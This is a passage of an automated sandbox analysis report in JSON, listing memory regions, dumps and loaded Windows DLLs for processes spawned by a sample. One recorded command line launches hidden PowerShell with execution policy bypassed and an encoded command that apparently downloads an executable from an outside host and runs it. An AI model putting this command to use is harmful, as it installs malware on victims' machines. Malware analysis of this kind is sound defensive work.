"end_va": 4128767, "entry_point": 0, "filename": null, "id": "region_551", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:00:32.288", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4456447, "entry_point": 0, "filename": null, "id": "region_552", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:00:32.288", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000553-addr_0x0000000000af0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_173", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 11468800, "type": "region", "version": 1 }, "end_va": 11993087, "entry_point": 0, "filename": null, "id": "region_553", "name": "private_0x0000000000af0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11468800, "timestamp": "00:00:32.289", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000554-addr_0x00000000002b0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_174", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_554", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:00:32.290", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1963196416, "type": "region", "version": 1 }, "end_va": 1963220991, "entry_point": 1963196416, "filename": "\\Windows\\SysWOW64\\rasadhlp.dll", "id": "region_555", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\syswow64\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 1963196416, "timestamp": "00:00:32.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11468800, "type": "region", "version": 1 }, "end_va": 11730943, "entry_point": 0, "filename": null, "id": "region_556", "name": "private_0x0000000000af0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11468800, "timestamp": "00:00:32.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 11927552, "type": "region", "version": 1 }, "end_va": 11993087, "entry_point": 0, "filename": null, "id": "region_557", "name": "private_0x0000000000b60000", "norm_filename": null, "region_type": "private_memory", "start_va": 11927552, "timestamp": "00:00:32.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 53215232, "type": "region", "version": 1 }, "end_va": 54263807, "entry_point": 0, "filename": null, "id": "region_558", "name": "private_0x00000000032c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 53215232, "timestamp": "00:00:32.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1963130880, "type": "region", "version": 1 }, "end_va": 1963196415, "entry_point": 1963130880, "filename": "\\Windows\\SysWOW64\\NapiNSP.dll", "id": "region_559", "name": "napinsp.dll", "norm_filename": "c:\\windows\\syswow64\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 1963130880, "timestamp": "00:00:32.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130329600, "type": "region", "version": 1 }, "end_va": 2130341887, "entry_point": 0, "filename": null, "id": "region_560", "name": "private_0x000000007efa4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130329600, "timestamp": "00:00:32.334", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 4063231, "entry_point": 0, "filename": null, "id": "region_561", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:00:32.341", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4128767, "entry_point": 0, "filename": null, "id": "region_562", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:00:32.343", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1962999808, "type": "region", "version": 1 }, "end_va": 1963073535, "entry_point": 1962999808, "filename": "\\Windows\\SysWOW64\\pnrpnsp.dll", "id": "region_563", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\syswow64\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 1962999808, "timestamp": "00:00:32.364", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1962737664, "type": "region", "version": 1 }, "end_va": 1962983423, "entry_point": 1962737664, "filename": "\\Windows\\SysWOW64\\mswsock.dll", "id": "region_564", "name": "mswsock.dll", "norm_filename": "c:\\windows\\syswow64\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 1962737664, "timestamp": "00:00:32.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42205184, "type": "region", "version": 1 }, "end_va": 42467327, "entry_point": 0, "filename": null, "id": "region_565", "name": "private_0x0000000002840000", "norm_filename": null, "region_type": "private_memory", "start_va": 42205184, "timestamp": "00:00:32.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 54460416, "type": "region", "version": 1 }, "end_va": 55508991, "entry_point": 0, "filename": null, "id": "region_566", "name": "private_0x00000000033f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 54460416, "timestamp": "00:00:32.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1962672128, "type": "region", "version": 1 }, "end_va": 1962692607, "entry_point": 1962672128, "filename": "\\Windows\\SysWOW64\\WSHTCPIP.DLL", "id": "region_567", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\syswow64\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 1962672128, "timestamp": "00:00:32.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130317312, "type": "region", "version": 1 }, "end_va": 2130329599, "entry_point": 0, "filename": null, "id": "region_568", "name": "private_0x000000007efa1000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130317312, "timestamp": "00:00:32.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1962606592, "type": "region", "version": 1 }, "end_va": 1962639359, "entry_point": 1962606592, "filename": "\\Windows\\SysWOW64\\winrnr.dll", "id": "region_569", "name": "winrnr.dll", "norm_filename": "c:\\windows\\syswow64\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 1962606592, "timestamp": "00:00:32.463", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1962541056, "type": "region", "version": 1 }, "end_va": 1962565631, "entry_point": 1962541056, "filename": "\\Windows\\SysWOW64\\wship6.dll", "id": "region_570", "name": "wship6.dll", "norm_filename": "c:\\windows\\syswow64\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 1962541056, "timestamp": "00:00:32.482", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988374527, "entry_point": 1988362240, "filename": "\\Windows\\SysWOW64\\normaliz.dll", "id": "region_571", "name": "normaliz.dll", "norm_filename": "c:\\windows\\syswow64\\normaliz.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:32.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4980736, "type": "region", "version": 1 }, "end_va": 5242879, "entry_point": 0, "filename": null, "id": "region_572", "name": "private_0x00000000004c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4980736, "timestamp": "00:00:32.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 49479680, "type": "region", "version": 1 }, "end_va": 50528255, "entry_point": 0, "filename": null, "id": "region_573", "name": "private_0x0000000002f30000", "norm_filename": null, "region_type": "private_memory", "start_va": 49479680, "timestamp": "00:00:32.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130305024, "type": "region", "version": 1 }, "end_va": 2130317311, "entry_point": 0, "filename": null, "id": "region_574", "name": "private_0x000000007ef9e000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130305024, "timestamp": "00:00:32.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1962475520, "type": "region", "version": 1 }, "end_va": 1962520575, "entry_point": 1962475520, "filename": "\\Windows\\SysWOW64\\msimtf.dll", "id": "region_575", "name": "msimtf.dll", "norm_filename": "c:\\windows\\syswow64\\msimtf.dll", "region_type": "memory_mapped_file", "start_va": 1962475520, "timestamp": "00:00:32.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2822143, "entry_point": 2818048, "filename": "\\Windows\\SysWOW64\\en-US\\msctf.dll.mui", "id": "region_576", "name": "msctf.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\msctf.dll.mui", "region_type": "memory_mapped_file", "start_va": 2818048, "timestamp": "00:00:32.550", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 42991616, "type": "region", "version": 1 }, "end_va": 43515903, "entry_point": 0, "filename": null, "id": "region_577", "name": "private_0x0000000002900000", "norm_filename": null, "region_type": "private_memory", "start_va": 42991616, "timestamp": "00:00:32.551", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1962213376, "type": "region", "version": 1 }, "end_va": 1962459135, "entry_point": 1962213376, "filename": "\\Windows\\SysWOW64\\oleacc.dll", "id": "region_578", "name": "oleacc.dll", "norm_filename": "c:\\windows\\syswow64\\oleacc.dll", "region_type": "memory_mapped_file", "start_va": 1962213376, "timestamp": "00:00:32.551", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\system32\\cmd.exe\" \"/c powershell.exe -ExeCUtIonPolIcY bypass -WINdowSTYLE hiddEn -ENCodedcOMMANd UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAG0AaQBuAGkAbQBpAHoAZQBkACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AC0AcwB6AGMAegBlAGMAaQBuAC4AcABsAC8AaQBtAGcAMgAvAHMANQAwAC4AZQB4AGUAJwAsAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABuAHYAcwBzAC4AZQB4AGUAHSApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAG4AdgBzAHMALgBlAHgAZQAdICkA \"", "filename": "c:\\windows\\syswow64\\cmd.exe", "id": "proc_4", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 4, "origin_monitor_id": 2, "ref_parent_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000004-region_00000758-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_180", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_758", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:45.973", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000759-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_181", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_759", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:45.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_760", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:00:45.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_761", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:45.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_762", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:45.977", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000763-addr_0x0000000000090000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_182", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 851967, "entry_point": 0, "filename": null, "id": "region_763", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:00:45.978", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000764-addr_0x0000000000110000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_183", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_764", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:00:45.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1250623488, "type": "region", "version": 1 }, "end_va": 1250934783, "entry_point": 1250623488, "filename": "\\Windows\\SysWOW64\\cmd.exe", "id": "region_765", "name": "cmd.exe", "norm_filename": "c:\\windows\\syswow64\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1250623488, "timestamp": "00:00:45.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_766", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:00:45.986", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_767", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:00:45.987", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_768", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:00:45.987", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000769-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_184", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_769", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:00:45.988", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000770-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_185", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_770", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:00:45.989", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000771-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_186", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_771", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:00:45.991", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_772", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:45.991", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000773-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_187", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_773", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:45.991", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_774", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:00:45.991", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000775-addr_0x00000000002e0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_188", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3538943, "entry_point": 0, "filename": null, "id": "region_775", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:00:46.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_776", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:00:46.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_777", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:00:46.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_778", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:00:46.003", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000779-addr_0x00000000774a0000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_189", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_779", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:00:46.004", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000780-addr_0x00000000775a0000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_190", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_780", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:00:46.004", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_781", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:46.094", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_782", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:46.094", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2584575, "entry_point": 2162688, "filename": "\\Windows\\System32\\locale.nls", "id": "region_783", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2162688, "timestamp": "00:00:46.095", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000784-addr_0x0000000000430000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_191", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 5439487, "entry_point": 0, "filename": null, "id": "region_784", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:00:46.095", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, 